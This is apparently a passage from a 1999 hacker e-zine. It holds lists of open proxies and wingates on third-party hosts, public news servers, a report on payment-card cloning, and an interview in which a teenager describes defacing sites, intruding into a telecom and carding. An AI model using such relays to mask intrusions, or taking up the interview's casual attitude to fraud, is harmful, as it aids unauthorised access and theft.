adsl-98.cais.com,207.176.4.98,
modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161,
NotFound,195.146.97.178,
fsf.santa.krs.ru,195.161.57.178,
HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57,
ohs.ocs.k12.al.us,216.77.56.122,
NotFound,195.14.148.100,
carver.ocs.k12.al.us,216.77.56.114,
oms.ocs.k12.al.us,216.77.56.106,
C824154A.podernet.com.mx,200.36.21.74,
NotFound,193.15.228.156,
wingate.shokoren.or.jp,210.145.221.99,
cpu1555.adsl.bellglobal.com,206.47.27.36,
NotFound,195.14.148.97,
expocom.dial-up.cz,193.85.249.31,
edtn003655.hs.telusplanet.net,161.184.150.99,
mb-kop-p2.mbusa.net,63.65.123.172,
www.sos.iqnet.cz,212.71.157.102,
jeter.ocs.k12.al.us,216.77.56.98,
modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241,
ip48.gte5.rb1.bel.nwlink.com,209.20.218.48,
sai0103.erols.com,207.96.118.243,
wforest.ocs.k12.al.us,216.77.56.82,
165-246.tr.cgocable.ca,24.226.165.246,
morris.ocs.k12.al.us,216.77.56.74,
ken9029.tsukuba.accs.or.jp,210.154.99.29,
www.cassvillesd.k12.wi.us,216.56.42.3,
ns.elaso.cz,195.146.96.178,
proxy.wmisd.k12.mi.us,199.176.179.4,
Public Proxies
~~~~~~~~~~~~~~
Non transparent proxies, suggest you use http://www.lightspeed.de/irc4all/
to test these when playing with them to see what info is passed.
Location Provider URL Port Protocol
AE pd4k-2.emirates.net.ae 8080 WWW / FTP
AR proxyweb2.ssdnet.com.ar 8080 WWW / FTP
AT erde.salzburg.at 8080 WWW / FTP
AU Hutchisons T.
proxy.hutch.com.au 80 WWW / FTP
AU OzEmail netcachesyd3.ozemail.com.au 8080 WWW / FTP
BE Government lino.privacy.fgov.be 8080 WWW / FTP
BN Brunei proxy1.brunet.bn 8080 WWW / FTP
BR Telemar CAICO.telern.com.br 80 WWW / FTP
CA Csjlor www.csjlor.qc.ca 8080 WWW / FTP
CA RAPIDUS 237-67-239.tr.cgocable.ca 80 WWW / FTP
CH proxy.vtx.ch 8080 WWW / FTP
COM IWVISP proxy.iwvisp.com 8080 WWW / FTP
COM HRO gateway.hro.com 8080 WWW / FTP
COM RipNET IS CacheFlow01.RipNET.com 8080 WWW / FTP
CZ inet01.cabletel.cz 80 WWW / FTP
CO Compunet proxy.compunet.net.co 3128 WWW / FTP
DE TU Berlin andele.cs.tu-berlin.de 80 WWW / FTP
DE Uni-Kl. maccaroni.unix-ag.uni-kl.de 3128 WWW / FTP
DE ibaserver.ub.uni-dortmund.de 8080 WWW / FTP
DK www-cache.net.uni-c.dk 3128 WWW / FTP
EDU hermes.curry.edu 8080 WWW / FTP
ES Softec linux.softec.es 8080 WWW / FTP
FR cri.ens-lyon.fr 3128 WWW / FTP
FR INFONIE proxy2.infonie.fr 80 WWW / FTP
HR gita.srce.hr 80 WWW / FTP
IL Goldnet goldcache.goldnet.net.il 80 WWW / FTP
IS dyna0.islandia.is 8080 WWW / FTP
IT colnuovo.iuss.unipv.it 80 WWW / FTP
JP inet-sv.zenon.co.jp 8080 WWW / FTP
JP ns.hiu.ac.jp 80 WWW / FTP
JP Tokyo Uni kpcu.kumamoto-pct.ac.jp 8080 WWW / FTP
KR Taegu biho.taegu.ac.kr 8080 WWW / FTP
KR Kyunghee cvs2.kyunghee.ac.kr 8080 WWW / FTP
LB data450.dm.net.lb 3128 WWW / FTP
NET bright.net cacheflow.bright.net 8080 WWW / FTP
NET Stargate Ind. cacheflow.tcg.sgi.net 8080 WWW / FTP
NET BRASILNET magic.brasilnet.net 8080 WWW / FTP
NET Global One gip-rjo-1-wc01.br.global-one.net 8080 WWW / FTP
NG engine3.micro.com.ng 8080 WWW / FTP
NL GelreVision webproxy.gelrevision.nl 80 WWW / FTP
NO webcache1.globalone.no 80 WWW / FTP
PH Info mail2.info.com.ph 3128 WWW / FTP
PH electron2.msc.net.ph 3128 WWW / FTP
PT Teleweb caclis01.teleweb.pt 3128 WWW / FTP
QA Qatarnet proxy.qatar.net.qa 8080 WWW / FTP NetFilter
RO lhab-gw.soroscj.ro 80 WWW / FTP
RU adam.rosinkas.ru 80 WWW / FTP new
SE Varnamo ns.varnamo.se 8080 WWW / FTP
SG proxy1.tp.ac.sg 80 WWW / FTP new
TR Turnet ankara3.turnet.net.tr 8080 WWW
TW Golden club.golden.com.tw 8080 WWW
TW IS c1.h202052106.is.net.tw 80 WWW / FTP
UK poptel.net softy.poptel.org.uk 8080 WWW / FTP
UK proxy1.cdesd.k12.or.us 80 WWW / FTP
US K12 stpauls.pvt.k12.al.us 8080 WWW / FTP
US cache.manistee-isd.k12.mi.us 80 WWW / FTP
YE ? sah3.ye 80 WWW / FTP
ZA M-Web proxy-rnb2.mweb.co.za 80 WWW / FTP
ZA M-Web proxy.cpt.mweb.co.za 80 WWW / FTP
ZW Cybergate proxy.cybergate.co.zw 8080 WWW / FTP down/busy ?
ZW Africaonline proxy.africaonline.co.zw 8080 WWW / FTP
(C) lp
http://www.lightspeed.de/irc4all/
Telnettable Proxies
~~~~~~~~~~~~~~~~~~~
NotFound,200.36.19.225,
NotFound,200.36.19.225,
NotFound,206.103.12.131,
NotFound,210.56.18.225,
NotFound,210.56.18.226,
NotFound,210.56.18.241,
NotFound,200.248.68.129,
NotFound,210.56.18.253,
NotFound,200.248.69.50,
noeljo9.lnk.telstra.net,139.130.54.153,
modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215,
edtn004203.hs.telusplanet.net,161.184.152.139,
NotFound,195.14.148.98,
blissr.lnk.telstra.net,139.130.54.131,
PPP46-166.lvsb.vsnl.net.in,202.54.46.166,
cr216724724.cable.net.co,216.72.47.24,
cr216724718.cable.net.co,216.72.47.18,
122-94.w3.com.uy,207.3.122.94,
saward.lnk.telstra.net,139.130.55.98,
icqtwsrv1.maiowoo.com,203.135.240.3,
NotFound,212.22.69.35,
122-85.w3.com.uy,207.3.122.85,
gw.eudynelson.com,207.176.25.66,
sis-zeus.sville.edu.ph,207.0.119.67,
dns-server1.tj.pa.gov.br,200.242.244.1,
theleu.lnk.telstra.net,139.130.74.160,
210-55-191-125.ipnets.xtra.co.nz,210.55.191.125,
nor24788-1.gw.connect.com.au,202.21.13.46,
NotFound,210.161.200.82,
www.slcr.cz,212.27.210.65,
NotFound,210.56.19.5,
northeastmicro.com,204.170.187.254,
NotFound,195.5.33.222,
marina.amakusa.gr.jp,210.164.238.50,
h0040053c7824.ne.mediaone.net,24.128.48.55,
NotFound,216.72.45.152,
tconl9076.tconl.com,204.26.90.76,
NotFound,193.227.185.210,
NotFound,194.243.99.199,
NotFound,202.54.48.85,
NotFound,200.21.157.61,
server.goway.com,205.206.42.162,
web.urudata.com.uy,207.3.122.84,
cr2167248104.cable.net.co,216.72.48.104,
frontier.netline.net.au,203.28.52.160,
interate.com.pe,209.45.73.174,
210-55-191-126.ipnets.xtra.co.nz,210.55.191.126,
com3058-2.gw.connect.com.au,202.21.8.108,
PPP46-254.lvsb.vsnl.net.in,202.54.46.254,
NotFound,195.14.148.99,
ibp.santa.krs.ru,195.161.57.133,
mail.theova.com,195.14.148.65,
cr2167254143.cable.net.co,216.72.54.143,
NotFound,142.250.6.2,
plebiscito.synapsis.it,195.31.227.14,
ipshome-gw.iwahashi.co.jp,210.164.242.146,
other.issei-dc.co.jp,210.164.241.99,
x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44,
NotFound,209.177.38.98,
www.ymts.sakha.ru,194.186.182.2,
mail.ermanco.com,12.2.82.130,
mail1.bikesusa.com,207.176.25.114,
ewwmail.ozemail.com.au,203.108.128.242,
modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106,
patter.lnk.telstra.net,139.130.81.160,
server.hirup.khmelnitskiy.ua,195.230.134.227,
port58151.btl.net,206.153.58.151,
wdpcbalt.wdpc.com,208.222.211.65,
dns.gincorp.co.jp,210.164.86.34,
ts18.svamberk.cz,212.47.11.231,
mail.coolmore.com.au,203.12.145.98,
NotFound,195.14.148.101,
cr216724770.cable.net.co,216.72.47.70,
ip110.gte5.rb1.bel.nwlink.com,209.20.218.110,
ci272608-a.sptnbrg1.sc.home.com,24.4.115.144,
edsl78.mpls.uswest.net,209.181.225.79,
NotFound,210.114.231.130,
mooty.lnk.telstra.net,139.130.81.14,
NotFound,168.187.78.34,
NotFound,203.116.5.58,
c111.h202052116.is.net.tw,202.52.116.111,
cr2167251178.cable.net.co,216.72.51.178,
altona.lnk.telstra.net,139.130.80.123,
NotFound,139.130.59.187,
nevisco.city.tvnet.hu,195.38.100.242,
edtn003590.hs.telusplanet.net,161.184.150.34,
NotFound,193.15.227.125,
dns1.ctsjp.co.jp,210.172.87.146,
gaon.zg.szczecin.pl,195.116.25.98,
NotFound,195.5.33.218,
edtn003331.hs.telusplanet.net,161.184.149.29,
edtn003725.hs.telusplanet.net,161.184.150.169,
dt027n36.san.rr.com,24.30.137.54,
tsp-proxy.tsss.com,12.2.81.50,
austra53.lnk.telstra.net,139.130.56.114,
NotFound,195.161.69.65,
modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118,
cascad.lnk.telstra.net,139.130.44.197,
edtn003171.hs.telusplanet.net,161.184.148.123,
tob24399-1.gw.connect.com.au,202.21.14.234,
ad112-162.magix.com.sg,165.21.112.162,
NotFound,195.146.98.226,
NotFound,193.232.250.133,
lesy.vol.cz,212.27.211.5,
HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103,
north.ocs.k12.al.us,216.77.56.66,
adsl-98.cais.com,207.176.4.98,
modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161,
NotFound,195.146.97.178,
fsf.santa.krs.ru,195.161.57.178,
HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57,
ohs.ocs.k12.al.us,216.77.56.122,
NotFound,195.14.148.100,
carver.ocs.k12.al.us,216.77.56.114,
oms.ocs.k12.al.us,216.77.56.106,
C824154A.podernet.com.mx,200.36.21.74,
NotFound,193.15.228.156,
wingate.shokoren.or.jp,210.145.221.99,
cpu1555.adsl.bellglobal.com,206.47.27.36,
NotFound,195.14.148.97,
expocom.dial-up.cz,193.85.249.31,
edtn003655.hs.telusplanet.net,161.184.150.99,
mb-kop-p2.mbusa.net,63.65.123.172,
www.sos.iqnet.cz,212.71.157.102,
jeter.ocs.k12.al.us,216.77.56.98,
modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241,
ip48.gte5.rb1.bel.nwlink.com,209.20.218.48,
sai0103.erols.com,207.96.118.243,
wforest.ocs.k12.al.us,216.77.56.82,
165-246.tr.cgocable.ca,24.226.165.246,
morris.ocs.k12.al.us,216.77.56.74,
ken9029.tsukuba.accs.or.jp,210.154.99.29,
www.cassvillesd.k12.wi.us,216.56.42.3,
ns.elaso.cz,195.146.96.178,
proxy.wmisd.k12.mi.us,199.176.179.4,
@HWA
04.0 Cyberarmy Proxies, Accounts and Wingates etc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
More goodies although somewhat less reliable, these are from the lists at
cyberarmy.com beware phishs, traps and plain bogus info mixed into the cruft.
Unfortunately this section was unavailable in time for this issue due
to server problems with cyberarmy.com. - Ed
@HWA
05.0 Belgium: Security of Banksys compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Zym0t1c an HWA correspondant
Sorry no URL provided -Ed
Belgium: Security of Banksys compromised
Unknown have succeeded into compromising the security of Banksys, the
company who controles payterminals such as Bancontact and Mister Cash. By
stealing a C-Zam payterminal at a gaz station these unknown captured a list
of credit cards and their codes. With this info they were able to create
fake credit cards. By using special equipment they copied this info on
blank plastic cards.
However, this story has two sides... Two days before the C-Zam payterminal
was stolen, three hundred people already lost ten thousend Belgian francs,
due to the use of fake credit cards. Youri Tolmatchov, spokesman of
Banksys, thinks these unknown stole the terminal for disappearing possible
evidence.
The Public Prosecutor thinks these unknown may have used binoculars or
cameras for monitoring used credit card codes. Then, creating the fake
cards is rather simple. Every good electronics store offers 'special
equipment' like card copiers. This trick was shown in a comic TV-show where
two guys were able to copy information of credit cards by using a copier and
a camera. The copies all worked perfectly. By the way, this Youri
Tolmatchov is sort of accusing the two TV-guys for their 'bad example.'
Banksys mentioned in a press conference the importance of using your secret
code very discreetly.
Incidents like these already took place in the past. One remarkable
incident was last year in France where a ghost terminal, forged by experts,
displayed 'out of use' and at the same time copied the card's info.
The next generation credit cards are more secure because they're based on
little computer chips which are very hard to copy.
A question: why has Banksys not increased their security after that
TV-incident two years ago? This is asking for troubles...
@HWA
06.0 Public access mail servers
~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: Not all newsgroups are available on all servers
Server Name Groups Posting
mailserver.corvis.ru 2405 Yes
malun1.mala.bc.ca 5383 Yes
enak.skif.net 6071 Yes
news.orconet.com 17034 Yes
valtan.sssp.mihara.hiroshima.jp 8541 Yes
news.precisionet.net 27820 Yes
24.48.24.174 21760 Yes
informer.hixnet.co.za 27127 Yes
news.bezeqint.net 32330 Yes
223.176.100.5 25887 Yes
news.cyberrealm.net 27827 Yes
news.nasionet.net 29285 Yes
system.nari-china.com 23611 Yes
news.digicon.net 26894 Yes
f400.n5020.z2.fidonet.org 2190 Yes (fido.* groups)
magpie.cat.net.th 29833 Yes
news.ku.ac.th 5315 No
hc2.hci.net 20455 Yes
news.usr.com 10463 Yes
news.netzwerk2000.de 54395 Yes
transcend.btrd.ab.ca 8052 Yes
news1.simtel.ru 17737 Yes
linux5.provincia.ps.it 4840 No
hq005is.seccom.com.my 17462 Yes
203.37.240.72 24000+ Yes
nntp.mmi.org 12277 Yes
206.97.174.98 32461 Yes
nntp1.sen.ca.gov 27608 Yes
fastnet-cache.disctronics.co.uk 22807 Yes
delphi.bc.edu 4062 No
203.41.190.130 22378 Yes
news.ochin.on.ca 20113 Yes
linux.lanetixx.de 7836 Yes
205.253.48.9 37121 Yes
207.227.203.4 45729 No
octopussy.berlin.detecon.de 2585 Yes
news.fcu.edu.tw 15156 No
208.128.255.6 27820 Yes
news.phys.uu.nl 9052 No
anode.phelpsd.com 3754 Yes
plato.devnull.tzo.net 23133 Yes
promoting.net 11406 No
news.phys.uu.nl 9212 No
news.icq.com 65 Yes (ICQ groups)
mail.advis.de 12812 Yes
24.112.33.188 31327 Yes
206.243.175.108 7554 Yes
news.digitalfoundry.com 3102 Yes
Plus many more, check out http://www.serverseekers.com/new.html for a complete
list and more details. - Ed
@HWA
07.0 Santa Claus about to lose his domain for nonpayment?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This was forwarded by another disgruntled elf (not the same one that lost his
job at Santa's workshop last year who forwarded us his credit report)...seems
Santa is feeling the crunch this year.
<snip>
Date DEC-1-, 1999
Domain Name: Santasworkshop.com
Invoice Number: 313370
Amount Due: $70.00 US Dollars
This letter s being sent as a courtesy to advise that our records show payment
for the domain name referenced above has not been received, surely a fat rich
fuck like yourself can afford a domain name?. Our records show that the following
person has been designated as the Billing Contact for the domain name in question.
Elfadmin
Admin, Elf
Santa's Workshop
POBOX H0H0H0
North Pole
Santa@santasworkshop.com
If you beleive that the payment and this notice may have crossed sleigh paths
please verify the payment status by calling (888) 771-3000 from the U.S, Canada
Peurto Rico and the U.S Virgin Islands. From other locations call (402) 496-9798
If payment is not received within 10 days from the date of this notice, domain
name service will be discontinued or one of your reindeer may be taken in leiu
of payment.
<snip>
Poor Santa... dire straits again... - Ed
@HWA
08.0 Interview with NFO (Nine Forty One Group)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NFO is a Brazilian hacking group that has been around for nearly a year
I caught up with one of the members on IRC and he agreed to a short
interview with me, so here's a peek into the mind of another hacker/cracker.
Their website is : http://www.self-evident.com/nfo/ check it out, they
also list a few recent hacks on the page...
Interview start (Slightly edited to remove personal chit chat otherwise verbatim)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Session Start: Fri Dec 24 15:33:53 1999
[15:33] <fickerguy> i'm nfo member
[15:33] <fickerguy> www.self-evident.com/nfo
<Cruciphux> you be on in a while?
<Cruciphux> under this nick?
[15:34] <fickerguy> now yes
<Cruciphux> ok ttyiab gotta finish something up
<Cruciphux> join #hwa.hax0r.news
<Cruciphux> and idle
<Cruciphux> if u want
<Cruciphux> bbiab
<Cruciphux> what does NFO stand for? just like it sounds? "info" ?
[15:40] <fickerguy> no hack group
[15:40] <fickerguy> we meet and hack
<Cruciphux> what does NFO stand for though? the group name?
<Cruciphux> can I interview you for the zine?
[15:40] <fickerguy> nfo=ninefortyone
[15:41] <fickerguy> now?
<Cruciphux> sure won't take long
[15:41] <fickerguy> ok
[15:41] <fickerguy> start
<Cruciphux> How long has NFO been around as a group and how many members do you have?
[15:42] <fickerguy> 6 months, 6 members
[15:42] <fickerguy> fickerguy, sysdenial, codak, thms, grafspee, vetesgirl
<Cruciphux> sorry was interrupted
<Cruciphux> do you deface websites or hack for access only?
<Cruciphux> I see some sites listed on your page
[15:46] <fickerguy> in the begging we were defacing a lot of brazilian government sites and some brazilians tv channels sites in brazil only cause we are brazilian except vetesgirl
<Cruciphux> ok
<Cruciphux> you are located in Brazil?
[15:46] <fickerguy> but after globo tv channels we decided to don't deface websites anymore cause in brazil only stupids are defecing sites nowadays
[15:47] <fickerguy> yes 5 of us
<Cruciphux> what is your opinion on the 'scene' today?
[15:47] <fickerguy> what do u mean? how r we on the scene?
<Cruciphux> what do you think about the other people in the scene?
<Cruciphux> general feelings
[15:48] <fickerguy> they r all assholes
[15:48] <fickerguy> as we are
<Cruciphux> good answer
<Cruciphux> ;)
[15:48] <fickerguy> heh we make groups and code to change with them and that's all :)
<Cruciphux> do you write your own exploits?
[15:48] <fickerguy> no i don't
<Cruciphux> would you call yourselves scriptkiddies then?
[15:49] <fickerguy> i do tools to use them heh
[15:49] <fickerguy> graf does
<Cruciphux> ok
[15:49] <fickerguy> graf writes exploit
[15:49] <fickerguy> as vetes and sys lots of skills and backdoors
[15:49] <fickerguy> skills/tools
<Cruciphux> what are the ages of the members in the group?
<Cruciphux> like oldest and youngest?
[15:50] <fickerguy> i dunno exactly i think thms is 18, codak 16 or 17, graf and sys older, more than 23 and vetes i forgot heh more than 30 iam 15
<Cruciphux> do you stay in contact off IRC or exclusively online?
<Cruciphux> like telephone etc
[15:51] <fickerguy> we 5 ( brazilians ) keep contact out of irc.. i mean telephone
<Cruciphux> ok do you phreak too?
[15:52] <fickerguy> no, all i do is that stuff with some wire in public phones and carding with some international phone cards
<Cruciphux> have any of your group or yourself ever been raided or afraid you might be?
[15:53] <fickerguy> i've been
[15:53] <fickerguy> i dunno about them
<Cruciphux> by who?
<Cruciphux> which agency?
[15:53] <fickerguy> i hacked main computers in telemar ( brazilian telephone company ) and they come my home
<Cruciphux> was the FBI involved? i've heard of the FBI acting outside of the US lately with Interpol in busts
[15:54] <fickerguy> other time brazilian feds got me
<Cruciphux> so Telephone Security personnel?
[15:54] <fickerguy> no
<Cruciphux> what were the consequences?
[15:54] <fickerguy> with the feds i got in court and telemar we made an agreement
<Cruciphux> cash settlement?
[15:55] <fickerguy> in the court as i was too young and a lot of talk they just asked me to don't do it anymore
[15:55] <fickerguy> and with te
lemar
<Cruciphux> lucky
[15:55] <fickerguy> i told them how i hacked them
[15:55] <fickerguy> and they forgive me
<Cruciphux> do you ever help out other admins after you've hacked their sites or patch holes you find?
[15:56] <fickerguy> yes i did
<Cruciphux> ok any last words you'd like to say?
[15:57] *** duro (duro@pm2-balt-98.qis.net) invites you to join #fawkerz
[15:57] <fickerguy> don't be a cow just hacking like a cow eat a lot of bullshit networks like a universtity in the end of the hell, hack cool stuff
<Cruciphux> ok anything else?
<Cruciphux> any greets?
<Cruciphux> :)
[15:58] <fickerguy> greets to my mother, father, brother, nfo members and specialy for you HEHEH
[15:58] <fickerguy> j/k
<Cruciphux> hehe
<Cruciphux> ok thanks for the interview i'll put it in issue #48
[15:59] <fickerguy> ok thank u for the enjoying time
[15:59] <fickerguy> i'll travel tonight
[15:59] <fickerguy> we talk next week
[15:59] <fickerguy> see ya
<Cruciphux> cya
Session Close: Fri Dec 24 15:59:42 1999
@HWA
09.0 The history of IRC (Internet Relay Chat)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is here coz I had a discussion on which IRC network came first and was
told Dalnet was before EFnet which I knew was wrong but it got me to thinking
not many people know the real stories of the networks they are using so here's
a couple of files on EFNet and DALNET for your edification and enlightenment - Ed
***NOTE! IF ANYONE has any info on BRC (Bitnet Relay Chat) I'd be VERY appreciative
if you could email the info or point me in the direction of information on this
predecessor to IRC mail to cruciphux@dok.org tnx!
Source: http://www.the-project.org/history.html
Early IRC history
Dates by Ian, comments by Helen (this is a very rough cut)
Send additions/corrections to frechett@colorado.edu
summer 1988 - irc2.0 released
this is Jarkko's tale of the releasing of irc:
From jto@rieska.oulu.fi Fri Dec 10 18:23:37 1993
Date: Fri, 10 Dec 93 14:46:17 +0200
From: jto@rieska.oulu.fi (Jarkko Oikarinen)
To: hrose@eff.org
Subject: IRC History...
Content-Length: 3752
Included is a history of IRC as I wrote maybe 3 or 4 years ago.
Hope it helps!
I don't know if this helps much. I hope I remember things correctly and
apologise people whom I have left out and they had deserved to be in here.
I was working in the Department of Information Processing Science in
University of Oulu during summer'88. I guess they didn't have much for me
to do. I was administring the department's sun server, but it didn't
take all time. So I started doing a communications program, which was
meant to make OuluBox (a Public Access BBS running on host tolsun.oulu.fi,
administered by me) a little more usable. The purpose was to allow
USENET News-kind of discussion and groups there in addition to real time
discussions and other BBS related stuff.
Jyrki Kuoppala (jkp@cs.hut.fi) had implemented rmsg program for sending
messages to people on other machines. It didn't have the channel concept
implemented (though it supported it), so it was mainly used for
person-to-person communications.
Another already existing simple multiuser chat program on OuluBox was
MUT (MultiUser Talk), it was written by Jukka Pihl (pihl@rieska.oulu.fi).
That program has a bad habit of not working properly, so in order to
fix this, the first implemented thing of this BBS plan was IRC.
The birthday of IRC was in August 1988. The exact date is unknown,
at the end of the month anyways.
Bitnet Relay Chat was a good inspiration for IRC. When IRC started
occasionally having more than 10 users, I asked some friends of mine to
start running irc servers in south Finland, mainly in Tampere University
of Technology and Helsinki University of Technology. Some other
universities soon followed. Markku J{rvinen (mta@cc.tut.fi) improved
the irc client (there was only one at that time) to support some emacs
editing commands. At that time it was obvious that adding BBS like
functions to the program was not a good idea, it's better to have
one program for one purpose. So the BBS extension idea was given up
and just IRC stayed.
IRC was well spread in Finland. I contacted some friends of mine through
BITNET Relay and asked if they would try this program. Internet connections
did not yet work from Finland to other countries, so they could not
connect to the Finnish network (which I suppose was the reason for them not
being very enthusiastic about irc).
Internet connections to states started working (I don't anymore remember when).
I answered to some news articles where people asked for multiuser chat
programs. I didn't get replies.
At mit, there was the legendary ai.ai.mit.edu machine running ITS.
I got an account there and learned to use it a little bit. Enough to
know how to chat with people. From there I got the first IRC user outside
Scandinavia, Mike Jacobs used IRC through OuluBox (he did not have account
on any Unix machines).
Through ai.ai.mit.edu I got to know Vijay Subramaniam (I hope I spelled
that correctly :-). I had given IRC to him and not heard of him for some
time. Then I got mail messages from Jeff Trim (used to be
jtrim@orion.cair.du.edu, University of Denver, current address unknown)
David Bleckmann (bleckmd@jacobs.cs.orst.edu) and Todd Ferguson
(melvin@jacobs.cs.orst.edu, Oregon State University).
Vijay had given IRC to them and they had started
ircd on their machines (orion.cair.du.edu and jacobcs.cs.orst.edu,
if I remember correctly) and wanted to connect to Finnish irc network.
After that some other people started running IRC, and the number
of servers grew quickly.
The first IRC server (and still running) was tolsun.oulu.fi
I have no idea of the latest one..
Aug 88 - first irc server tolsun.oulu.fi
89 - ircII released by Michael Sandrof (BigCheese)
Mar 90 - 2.2msa4
Jun 90 - 2.5beta ("+" named channels)
Jun 90 - ircII 1.90a
Jul 90 - 12 users on 38 servers
Aug 90 - IRC splits into EFnet (Eris Free) and Anet (Anarchy)
Sep 90 - 117 servers
Sep 90 - 41 users 86 servers
Nov 90 - version 2.6 released
Dec 90 - ircII 2.0beta10
late 90 - Darren Reed (Avalon) adds hash tables when IRC stops under load
xxxx 91 - Troy Rollo (Troy) takes over ircII development
Jan 91 - The Gulf war.. usage goes from peak 100 to peak 300
Jan 91 - version 2.6.1 adds flow control..
Feb 91 - bandwidth NSF stats record 8.8 Gigs for month of Feb
Mar 91 - NSF is all T1
Mar 91 - 2.6pre18 (famous for running on services.de long after 2.7 release)
Mar 91 - bandwidth 200k/2 hours
Mar 91 - 135 servers 69 us 66 non us
Apr 91 - 240 users median
Jun 91 - Cori booted off
Jul 91 - The.PLAN
Aug 91 - ircII 2.1.3
Oct 91 - 399 users 120 servers 44 opers (hits 500)
Nov 91 - ircII 2.1.5pre3
Sum 92 - ICMP attacks (cert advisory July 92)
Jan 93 - Matthew Green (phone) takes over ircII development
xxxx 94 - irc.colorado.edu hits 1000 users
late 94 - IRC hits 5,000 users
mid 95 - irc.escape.com hits 2000 users
Oct 95 - IRC hits 15,000 users
Feb 96 - Possibly largest channel ever. Id releases Qtest. #Quake sees 1556 users
May 96 - Europe and the US EFnet splits into two separate networks as a result of a disagreement on whether the network should use TS or Nick Delay as a means to prevent nick collisions.
Apr 97 - IRC hits 30,000 users
Jun 97 - irc-e.primenet.com and irc1.phoenix.net both break 3000 clients
Oct 97 - "smurf.c" - multi-broadcast ICMP attack posted to Bugtraq
Denial of Service attacks on EFnet servers hit an all-time high
Jan 98 - IRC hits 40,000 users
Mar 98 - irc.blackened.com breaks 4000 clients
Apr 98 - irc.blackened.com breaks 5000 clients
May 98 - irc.blackened.com breaks 6000 clients
Jun 98 - irc.blackened.com breaks 7000 clients
Sep 98 - irc.blackened.com breaks 8000 clients
Feb 99 - irc.idle.net breaks 9000 clients
Feb 99 - irc.idle.net breaks 10000 clients
Feb 99 - IRC hits 50,000 users
Jul 99 - irc.freei.net breaks 11000 clients
Aug 99 - irc.concentric.net breaks 12000 clients
Aug 99 - irc.concentric.net breaks 13000 clients
Nov 99 - EFnet breaks 60,000 clients
Nov 99 - irc.core.com breaks 14000 clients
Dec 99 - irc.core.com breaks 15000 clients
Dec 99 - irc.core.com breaks 16000 clients
Need dates for
- IRC gets 10 servers
see my note above from Jarkko
- IRC gets 100 servers
the very first time it was done was May 1990, but it soon dropped down
again. It was before the split and anyone could set up a server so we set
up a few on machines at UC to bring the total up to 100 :-)
[before EFnet/Anet]
- IRC gets 200 servers (it has been over 200.. but has dropped since)
- irc2.4 (numeric only channels)
here's a bit of history...
I first started using irc in January or February of 1990. At the time the
latest server revs were 2.2PL0 and 2.2PL1. msa and Chelsea Ashley Dyerman
were working on the 2.3 release ... there was a disagreement between them
about the copyrights. Chelsea had everything copyrighted by the IRCDC (IRC
Development Consortium). People told her they didn't like that, it should
be GPL'ed. She released 2.3alpha with those copyrights. Very few sites ran
it as it didn't offer much over 2.2PL1.
At the same time, msa was doing his own work. He added very handy things
like /whowas, nick chase kill, wallops (later removed), and remote /away
propogation. He had several releases, the most stable being 2.2msa4 and
2.2msa9. 2.2msa10 eventually turned into 2.4 (2.3 was "tainted" by
Chelsea).
Jarkko came along and did a bit of cleanup on 2.4 (which was stable in and
of itself) and released 2.4.1.
- irc2.5
Armin did 2.5 alpha, and then Jarkko took it over, with his idiotic 2.5+
release. msa (I believe) did 2.5.1 ... then Tom Hopkins and some other BU
folks (myself included) collaborated on 2.5.1.bu.10, possibly the most
stable server version to date :-) No new features went into 2.5.1.bu.10
(also called 2.5.2 in the docs, but it was never released as such), just
bug fixes. I wish we did that nowadays :-)
- irc2.6 + channels (still have numerics) # channels added later on
Armin started the 2.6 release and then Avalon took it over.
- irc2.7 # channels replace + channels and numerics go away forever
2.7 was a nice cleanup release. People tried to do things a bit more by
the book. ircd was put through a saber C check (and bullied into
compliance :-)
Bans were added to the server in 2.7. In 2.6 you could kick a user out but
had to rekick or go +i to stop them from rejoining.
- irc2.8 & channels..
- irc2.9 + channels are back, sorta
Read the operlist archives on ftp.kei.com:/pub/irc/mailing-lists
USBIC, planned in 1993, never passed. Again, more archives on
ftp.kei.com:/pub/irc
Again, I really suggest you look at the operlist and irclist archives on
ftp.kei.com:/pub/irc/mailing-lists -- it covers most of these issues.
- WALLOPS removed
Again, the dates should be in the archives
- MODES added
modes were added with + channels.
-=-
Source: http://www.dalnet.com/
DALNET History file
The History of IRC
September 1999
Contents
1. Some information on IRC
2. Some information on DALnet
3. Looking to the future
1. Some Info on IRC
IRC or Internet Relay Chat was originally written by Jarkko Oikarinen in
the year 1988. Since it's birth in Finland, IRC is in use in over sixty
countries worldwide. IRC was originally designed as a replacement for a
program called "Talk". "What is IRC?" you may ask. IRC is a
multi-user chat system that connects 'servers' around the world by means
of a 'cable' of sorts. These servers form a gigantic web that allows you
to connect to a given server. You can then join 'chat rooms' or 'channels'
that don't really exist. They are virtual meeting halls of sorts. This
allows anyone with an internet connection to participate in live chat. IRC
is a constantly evolving machine. New changes are made to the IRCd
(Internet Relay Chat Daemon or server program) that make your IRC
experience all the more enjoyable. DALnet coders have recently created a
new IRCd, Bahamut, which enables servers to run faster and more
efficiently. You can get more information at http://www.bahamut.net.
During IRC's relativly short history it has quickly shown it's superiority
over other chat systems like those owned by America On Line. This is
because of several reasons. Firstly, IRC is free. There is no charge to
use IRC or DALnet and there are no prerequisets to join.
Internet Relay Chat was propelled into the spotlight during the gulf war
in 1991. During this period information was relayed from around the world.
Family's could communicate from thousands of miles away. IRC was a meeting
place and an information clearinghouse for those who needed
